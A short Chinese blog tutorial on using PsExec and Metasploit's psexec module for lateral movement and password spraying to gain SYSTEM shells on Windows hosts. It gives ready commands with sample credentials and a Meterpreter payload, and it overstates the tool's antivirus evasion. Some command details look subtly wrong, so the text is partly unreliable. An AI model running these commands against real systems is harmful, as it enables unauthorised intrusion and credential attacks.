横向渗透之PsExec工具使用_psrxc
赞
踩
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限
PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,
并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。
PsExec的基本原理是:
通过管道在远程目标机器上创建一个psexec服务,
并在本地磁盘中生成一个名为PSEXESVC的二进制文件,
然后通过psexec服务运行命令,运行结束后删除任务。
利用条件
445端口开放,
知道目标账号密码
- 1
- 2
PsExec下载地址
优点:可以躲避检测无视杀毒软件,直接system权限
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
- 1
基本使用命令
``
PsExec.exe /s cmd # 本地提权,还有一个提权作用,直接system权限
PsExec.exe \127.0.0.1 -u Administrator -p 123qwe@@ /s cmd # 本地提权
PsExec.exe \172.16.1.132 -u Administrator -p 123qwe@@ /s cmd # 横向入侵Windows主机,直接system权限
``
直接返回一个system权限的shell
Metasploit中的psexec模块
密码喷洒指的是用一个密码对多个账号对目标进行枚举爆破,躲避密码输入错误过多导致封锁账号
利用metasploit进行密码喷洒
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set smbuser user.txt
msf6 exploit(windows/smb/psexec) > set smbpass password.txt
msf6 exploit(windows/smb/psexec) > set rhost 172.16.1.132
msf6 exploit(windows/smb/psexec) > run
成功后直接返回一个system权限的主机上线msf
很多框架的集成了psexec工具,比如CS内网大杀器也结成了这个工具。总之就是牛逼6666
